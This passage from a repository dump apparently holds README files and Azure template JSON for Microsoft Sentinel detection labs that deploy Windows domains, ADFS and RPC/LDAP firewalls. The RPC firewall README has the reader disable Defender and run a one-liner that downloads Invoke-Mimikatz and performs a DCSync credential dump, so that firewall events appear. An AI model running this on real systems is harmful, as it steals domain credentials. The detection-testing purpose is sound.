| Key, any(Value), TimeGenerated, TenantId, SourceSystem, 72 | EventID, Computer, Facility, SeverityLevel, HostIP, MG, Type, _ResourceId 73 | ) 74 | | summarize count() by tostring(EventID) 75 | ``` 76 | 77 | Additionally, as part of the [ASIM](https://docs.microsoft.com/en-us/azure/sentinel/normalization-content) (Microsoft Sentinel Information Model) project, we have created parsers for [Sysmon for Linux](https://github.com/Azure/Azure-Sentinel/tree/master/Parsers/ASim%20Sysmon%20for%20Linux). The parsers get imported automatically by the template we use to deploy the lab environment. Therefore, you can simply use the parsers available under **Functions** > **Workspace functions**: 78 | 79 | ``` 80 | VimProcessCreateLinuxSysmon 81 | | limit 10 82 | ``` 83 | 84 | ![](../../../../resources/images/linux-sysmon-azure-sentinel.png) 85 | -------------------------------------------------------------------------------- /grocery-list/Win10-AD-ADFS/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 + Windows Server (Active Directory) + Windows Server (Active Directory Federation Services) 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD-ADFS%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD-ADFS%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Security Events via AMA](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#windows-security-events-via-ama) data connector enabled. 12 | * [Windows Forwarded Events](https://learn.microsoft.com/en-us/azure/sentinel/data-connectors/windows-forwarded-events) data connector enabled. 13 | * [Data collection rules (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect Windows Security events. 14 | * Windows event channels enabled 15 | * `System` 16 | * `Microsoft-Windows-Sysmon/Operational` 17 | * `Directory Service` 18 | * `Windows PowerShell` 19 | * `Microsoft-Windows-PowerShell/Operational` 20 | * `AD FS/Admin` 21 | * One Windows Active Directory domain (One Domain Controller) 22 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 23 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 24 | * Active Directory Certificate Services (AD CS) Certification Authority (CA) role service enabled 25 | * Enterprise Root Certificate Authority created 26 | * ADFS Site Certificate created 27 | * ADFS Signing Certificate created 28 | * ADFS Decryption Certificate created 29 | * SMB share C:\Setup created to distribute ADFS certificates (.CER & .PFX files) 30 | * Full Access: Domain Admins & Domain Computers 31 | * Read Access: Authenticated Users 32 | * ADFS service account created 33 | * Azure Active Directory (AAD) Connect installed 34 | * One Windows Active Directory Federation Services (ADFS) server 35 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 36 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 37 | * Active Directory Federation Services Role Service enabled 38 | * ADFS .pfx certificate retrieved from DC C:\Setup share 39 | * ADFS farm installed 40 | * Idp-Initiated Sign On page enabled 41 | * ADFS WebContent customized (Title, Web Theme, SignIn description) 42 | * ADFS Logging (SuccessAudits & FailureAudits) enabled 43 | * ADFS Auditing 44 | * Level: Verbose 45 | * Auditpol command: auditpol.exe /set /subcategory:"Application Generated" /failure:enable /success:enable 46 | * Azure Active Directory (AAD) Connect installed 47 | * Windows 10 Workstations (Max. 10) 48 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 49 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 50 | * [OPTIONAL] Sysmon 51 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml) 52 | * [ASIM Sysmon Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20Sysmon%20for%20Windows/SysmonFullDeployment.json) 53 | * [OPTIONAL] Command and Control (c2) options: 54 | * `empire` 55 | * `covenant` 56 | * `metasploit` 57 | * Remote Access Restrictions (`AllowPublicIP` default option) 58 | * Access via Azure Bastion (Recommended. Additional costs applied) 59 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) -------------------------------------------------------------------------------- /grocery-list/Win10-AD-WEC/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 + Windows Server (Domain Controller - Active Directory) + Windows Event Collector (WEC) 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD-WEC%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD-WEC%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Security Events via AMA](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#windows-security-events-via-ama) data connector enabled. 12 | * [Data collection rule (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect Windows Security events. 13 | * [ASIM Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20WindowsEvent/ARM/MicrosoftWindowsEventFullDeployment.json). 14 | * One Windows Active Directory domain (One Domain Controller) 15 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 16 | * [Windows Event Forwarding (WEF) client configured](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Configure-WEF-Client.ps1). 17 | * One Windows Event Collector (WEC) 18 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 19 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 20 | * [WEC configured](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Configure-WEC.ps1). 21 | * [Windows event subscriptions](https://github.com/OTRF/Blacksmith/tree/master/resources/configs/wef/subscriptions) deployed. 22 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 23 | * Windows 10 Workstations (Max. 10) 24 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 25 | * [Windows Event Forwarding (WEF) client configured](https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/auditing/Configure-WEF-Client.ps1). 26 | * [OPTIONAL] Sysmon 27 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml) 28 | * [ASIM Sysmon Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20Sysmon%20for%20Windows/SysmonFullDeployment.json). 29 | * [OPTIONAL] Command and Control (c2) options: 30 | * `empire` 31 | * `covenant` 32 | * `metasploit` 33 | * Remote Access Restrictions (`AllowPublicIP` default option) 34 | * Access via Azure Bastion (Recommended. Additional costs applied) 35 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) -------------------------------------------------------------------------------- /grocery-list/Win10-AD/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 + Windows Server (Domain Controller - Active Directory) 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-AD%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Security Events via AMA](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#windows-security-events-via-ama) data connector enabled. 12 | * [Windows Forwarded Events](https://learn.microsoft.com/en-us/azure/sentinel/data-connectors/windows-forwarded-events) data connector enabled. 13 | * [Data collection rules (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect Windows Security events. 14 | * Windows event channels enabled 15 | * `System` 16 | * `Microsoft-Windows-Sysmon/Operational` 17 | * `Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational` 18 | * `Microsoft-Windows-Bits-Client/Operational` 19 | * `Microsoft-Windows-TerminalServices-LocalSessionManager/Operational` 20 | * `Directory Service` 21 | * `Microsoft-Windows-DNS-Client/Operational` 22 | * `Microsoft-Windows-Windows Firewall With Advanced Security/Firewall` 23 | * `Windows PowerShell` 24 | * `Microsoft-Windows-PowerShell/Operational` 25 | * `Microsoft-Windows-WMI-Activity/Operational` 26 | * One Windows Active Directory domain (One Domain Controller) 27 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 28 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 29 | * Windows 10 Workstations (Max. 10) 30 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 31 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 32 | * [OPTIONAL] Sysmon 33 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml) 34 | * [ASIM Sysmon Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20Sysmon%20for%20Windows/SysmonFullDeployment.json) 35 | * [OPTIONAL] Command and Control (c2) options: 36 | * `empire` 37 | * `covenant` 38 | * `metasploit` 39 | * Remote Access Restrictions (`AllowPublicIP` default option) 40 | * Access via Azure Bastion (Recommended. Additional costs applied) 41 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) 42 | -------------------------------------------------------------------------------- /grocery-list/Win10-LDAPFW/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 + Domain Controller (Active Directory) + LDAP Firewall (LDAPFW) Project 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-LDAPFW%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-LDAPFW%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Forwarded Events](https://learn.microsoft.com/en-us/azure/sentinel/data-connectors/windows-forwarded-events) data connector enabled. 12 | * [Data collection rule (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect LDAP Firewall events. 13 | * One Windows Active Directory domain (One Domain Controller) 14 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 15 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 16 | * [LDAP Firewall](https://github.com/zeronetworks/ldapfw) installed. 17 | * [OPTIONAL] Command and Control (c2) options: 18 | * `empire` 19 | * `metasploit` 20 | * Remote Access Restrictions (`AllowPublicIP` default option) 21 | * Access via Azure Bastion (Recommended. Additional costs applied) 22 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) 23 | 24 | ## Validate Event Generation 25 | 26 | 1. RDP to DC01 27 | 2. Open Event Viewer and go to `Applications and Services Logs` > `LDAPFW` 28 | 29 | ![](../../resources/images/win10-ldapfw_check_events.png) 30 | 31 | ## Query Events in Microsoft Sentinel 32 | 33 | 1. Go to [https://portal.azure.com/](https://portal.azure.com/) and search for `Microsoft Sentinel`. 34 | 2. Go to `logs` 35 | 3. Query the `WindowsEvent` table and filter events on the `LDAPFW` channel. 36 | 37 | ![](../../resources/images/win10-ldapfw_query_ldap_firewall.png) 38 | -------------------------------------------------------------------------------- /grocery-list/Win10-LDAPFW/linkedtemplates/customScriptExtension.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "virtualMachines": { 6 | "type": "array", 7 | "metadata": { 8 | "description": "List of endpoints to run a script. The format is an array of endpoints with a property/attribute named 'vmName'" 9 | } 10 | }, 11 | "fileUris": { 12 | "type": "array" 13 | }, 14 | "commandToExecute": { 15 | "type": "string" 16 | }, 17 | "location": { 18 | "type": "string", 19 | "metadata": { 20 | "description": "Location for all resources." 21 | } 22 | } 23 | }, 24 | "resources": [ 25 | { 26 | "type": "Microsoft.Compute/virtualMachines/extensions", 27 | "apiVersion": "2021-07-01", 28 | "name": "[concat(parameters('virtualMachines')[copyIndex('runScriptCopy')].vmName, '/', parameters('virtualMachines')[copyIndex('runScriptCopy')].extensionName)]", 29 | "location": "[parameters('location')]", 30 | "copy": { 31 | "name": "runScriptCopy", 32 | "count": "[length(parameters('virtualMachines'))]" 33 | }, 34 | "properties": { 35 | "publisher": "Microsoft.Compute", 36 | "type": "CustomScriptExtension", 37 | "typeHandlerVersion": "1.8", 38 | "autoUpgradeMinorVersion": true, 39 | "settings": { 40 | "fileUris": "[parameters('fileUris')]", 41 | "commandToExecute": "[parameters('commandToExecute')]" 42 | }, 43 | "protectedSettings": {} 44 | } 45 | } 46 | ] 47 | } 48 | -------------------------------------------------------------------------------- /grocery-list/Win10-PAN-FW/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel + Win10 + Palo Alto Networks VM-Series Firewall 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-PAN-FW%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-PAN-FW%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Security Events via AMA](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#windows-security-events-via-ama) data connector enabled. 12 | * [Data collection rule (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect Windows Security events. 13 | * [CEF Data Connector Enabled](https://docs.microsoft.com/en-us/azure/sentinel/connect-common-event-format). 14 | * [Palo Alto Networks Data Connector enabled](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#palo-alto-networks). 15 | * One Ubuntu Server 16 | * CEF Collector Server (RSyslog) 17 | * Linux [Microsoft Monitoring Agent](https://docs.microsoft.com/en-us/services-hub/health/mma-setup) installed. 18 | * Palo Alto Networks VM-Series firewall 19 | * Bundle 2 Subscription: It includes the VM-Series capacity license with the complete suite of licenses that includes Threat Prevention, GlobalProtect, WildFire, PAN-DB URL Filtering, and a premium support entitleme 20 | * Windows 10 Workstations (Max. 10) 21 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 22 | * Windows [Azure Monitoring Agent](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/azure-monitor-agent-overview?tabs=PowerShellWindows) installed. It connects to the Microsoft Sentinel Log Analytics workspace defined in the template. 23 | * [OPTIONAL] Sysmon 24 | * [Sysmon Config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/sysmon/sysmon.xml) 25 | * [ASIM Sysmon Windows parser](https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Parsers/ASim%20Sysmon%20for%20Windows/SysmonFullDeployment.json) 26 | * [OPTIONAL] Command and Control (c2) options: 27 | * `empire` 28 | * `covenant` 29 | * `metasploit` 30 | * Remote Access Restrictions (`AllowPublicIP` default option) 31 | * Access via Azure Bastion (Recommended. Additional costs applied) 32 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) 33 | 34 | ## VM-Series Licensing Process 35 | 36 | For both AWS and Microsoft Azure, the licensing options are bring your own license (BYOL) and pay as you go/consumption-based (PAYG) subscriptions. 37 | 38 | * **BYOL**: Any one of the VM-Series models, along with the associated Subscriptions and Support, are purchased via normal Palo Alto Networks channels and then deployed through your AWS or Azure management console. 39 | * **PAYG (Pay-as-you-go)**: Purchase the VM-Series and select Subscriptions and Premium Support as an hourly subscription bundle from the AWS Marketplace. 40 | * **Bundle 1 contents**: VM-300 firewall license, Threat Prevention Subscription (inclusive of IPS, AV, Malware prevention) and Premium Support. 41 | * **Bundle 2 contents**: VM-300 firewall license, Threat Prevention (inclusive of IPS, AV, Malware prevention), WildFire™ threat intelligence service, URL Filtering, GlobalProtect Subscriptions and Premium Support. 42 | 43 | ## Accept Azure VM Marketplace Terms (MUST DO) 44 | 45 | * The Palo Alto Networks (PAN) VM-Series Firewall is deployed from Azure Marketplace. You need to accept the legal terms to use the VM. 46 | * You must have authorization to perform action `Microsoft-MarketPlaceOrdering/offerTypes/publishers/offers/plans/agreements/write` over scope `subscription`. 47 | * **Make sure you run the commands below before deploying this template** 48 | * You can do it locally via [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/?view=azure-cli-latest) or via the [Azure Clould Shell](https://shell.azure.com/). 49 | 50 | Look for the PAN VM-Series Firewall you are deploying: 51 | 52 | ``` 53 | az vm image list --all --publisher paloaltonetworks --offer vmseries1 --sku bundle2 --query '[0].urn' 54 | ``` 55 | 56 | Accept terms: 57 | 58 | ``` 59 | az vm image terms accept --urn paloaltonetworks:vmseries1:bundle2:7.1.1 60 | ``` 61 | -------------------------------------------------------------------------------- /grocery-list/Win10-RPCFW/README.md: -------------------------------------------------------------------------------- 1 | # Windows 10 + Domain Controller (Active Directory) + RPC Firewall (RPCFW) Project 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-RPCFW%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10-RPCFW%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Forwarded Events](https://learn.microsoft.com/en-us/azure/sentinel/data-connectors/windows-forwarded-events) data connector enabled. 12 | * [Data collection rule (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect RPC Firewall events. 13 | * [Windows RPC Firewall parser](https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/microsoft-sentinel/linkedtemplates/parsers/winRPCFWLogs.json). 14 | * One Windows Active Directory domain (One Domain Controller) 15 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 16 | * [RPC Firewall](https://github.com/zeronetworks/rpcfirewall) installed. 17 | * [RPC Firewall config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/rpcfirewall/RpcFw.conf) used. 18 | * Windows 10 Workstations (Max. 10) 19 | * [Data Collection Rule (DCR) association](https://docs.microsoft.com/en-us/azure/azure-monitor/agents/data-collection-rule-azure-monitor-agent#data-collection-rule-associations) 20 | * [RPC Firewall](https://github.com/zeronetworks/rpcfirewall) installed. 21 | * [RPC Firewall config](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/rpcfirewall/RpcFw.conf) used. 22 | * [OPTIONAL] Command and Control (c2) options: 23 | * `empire` 24 | * `metasploit` 25 | * Remote Access Restrictions (`AllowPublicIP` default option) 26 | * Access via Azure Bastion (Recommended. Additional costs applied) 27 | * Restrict Access to one Public IP Address (For example, Home Public IP Address) 28 | 29 | ## Validate Event Generation 30 | 31 | 1. RDP to DC01 32 | 2. Open Event Viewer and go to `Applications and Services Logs` > `RPCFWP` 33 | 34 | ![](../../resources/images/win10-rpcfw_check_events.png) 35 | 36 | ## Validate RPC Firewall Capabilities 37 | ### Monitor Directory Replication Service (DRS) RPC Calls 38 | 39 | 1. Validate that the domain controller contains the `RpcFw.conf` file in the `C:\ProgramData\` folder. 40 | 2. Validate that the following entry exists in the config file: 41 | 42 | ``` 43 | fw:uuid:e3514235-4b06-11d1-ab04-00c04fc2dcd2 action:allow audit:true verbose:true 44 | ``` 45 | 46 | 3. If you update the configuration, make sure you run the following command: 47 | 48 | ```PowerShell 49 | .\RpcFwManager.exe /update 50 | ``` 51 | 52 | 4. Disable Defender 53 | 5. Open PowerShell as an Administrator and run the following commands: 54 | 55 | ```PowerShell 56 | IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -Command '"lsadump::dcsync /domain:mssentinel.local /user:mssentinel\pgustavo" "exit"' 57 | ``` 58 | 59 | 6. Open Event Viewer and go to `Applications and Services Logs` > `RPCFWP` 60 | 61 | ![](../../resources/images/win10-rpcfw_mk_dcsync.png) 62 | 63 | ### Block Directory Replication Service (DRS) RPC Calls 64 | 65 | 1. Validate that the domain controller contains the `RpcFw.conf` file in the `C:\ProgramData\` folder. 66 | 2. Validate that the following entry exists in the config file: 67 | 68 | ``` 69 | fw:uuid:e3514235-4b06-11d1-ab04-00c04fc2dcd2 addr:127.0.0.1 action:allow 70 | fw:uuid:e3514235-4b06-11d1-ab04-00c04fc2dcd2 action:block audit:true verbose:true 71 | ``` 72 | 73 | 3. If you update the configuration, make sure you run the following command: 74 | 75 | ```PowerShell 76 | .\RpcFwManager.exe /update 77 | ``` 78 | 79 | 4. Disable Defender 80 | 5. Open PowerShell as an Administrator and run the following commands: 81 | 82 | ```PowerShell 83 | IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -Command '"lsadump::dcsync /domain:mssentinel.local /user:mssentinel\pgustavo" "exit"' 84 | ``` 85 | 4. Open Event Viewer and go to `Applications and Services Logs` > `RPCFWP` 86 | 87 | ![](../../resources/images/win10-rpcfw_block_replication_event.png) 88 | 89 | ## Query Events in Microsoft Sentinel 90 | 91 | 1. Go to [https://portal.azure.com/](https://portal.azure.com/) and search for "Microsoft Sentinel". 92 | 2. Go to `logs` 93 | 3. There will be a function / parser already available for you to query RPC Firewall events: 94 | 95 | ![](../../resources/images/win10-rpcfw_query_rpcfirewall_limit10.png) 96 | 97 | 4. Run a basic query to find the use of Directory Replication Services (DRS) in your environment: 98 | 99 | ![](../../resources/images/win10-rpcfw_query_rpcfirewall_where_replication.png) 100 | 101 | ## References: 102 | * https://github.com/Cyb3rWard0g/WinRpcFunctions 103 | * https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/06205d97-30da-4fdc-a276-3fd831b272e0 104 | * https://github.com/zeronetworks/rpcfirewall 105 | * https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/58f33216-d9f1-43bf-a183-87e3c899c410 -------------------------------------------------------------------------------- /grocery-list/Win10-RPCFW/linkedtemplates/customScriptExtension.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "virtualMachines": { 6 | "type": "array", 7 | "metadata": { 8 | "description": "List of endpoints to run a script. The format is an array of endpoints with a property/attribute named 'vmName'" 9 | } 10 | }, 11 | "fileUris": { 12 | "type": "array" 13 | }, 14 | "commandToExecute": { 15 | "type": "string" 16 | }, 17 | "location": { 18 | "type": "string", 19 | "metadata": { 20 | "description": "Location for all resources." 21 | } 22 | } 23 | }, 24 | "resources": [ 25 | { 26 | "type": "Microsoft.Compute/virtualMachines/extensions", 27 | "apiVersion": "2021-07-01", 28 | "name": "[concat(parameters('virtualMachines')[copyIndex('runScriptCopy')].vmName, '/', parameters('virtualMachines')[copyIndex('runScriptCopy')].extensionName)]", 29 | "location": "[parameters('location')]", 30 | "copy": { 31 | "name": "runScriptCopy", 32 | "count": "[length(parameters('virtualMachines'))]" 33 | }, 34 | "properties": { 35 | "publisher": "Microsoft.Compute", 36 | "type": "CustomScriptExtension", 37 | "typeHandlerVersion": "1.8", 38 | "autoUpgradeMinorVersion": true, 39 | "settings": { 40 | "fileUris": "[parameters('fileUris')]", 41 | "commandToExecute": "[parameters('commandToExecute')]" 42 | }, 43 | "protectedSettings": {} 44 | } 45 | } 46 | ] 47 | } 48 | -------------------------------------------------------------------------------- /grocery-list/Win10/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel + Windows 10 Workstations 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fazuredeploy.json) 4 | [![Deploy to Azure Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FWin10%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * [Windows Security Events via AMA](https://docs.microsoft.com/en-us/azure/sentinel/data-connectors-reference#windows-security-events-via-ama) data connector enabled. 12 | * [Windows Forwarded Events](https://learn.microsoft.com/en-us/azure/sentinel/data-connectors/windows-forwarded-events) data connector enabled. 13 | * [Data collection rules (DCR)](https://docs.microsoft.com/en-us/azure/templates/microsoft.insights/datacollectionrules?tabs=json) to collect Windows Security events. 14 | * Windows event channels enabled 15 | * `System` 16 | * 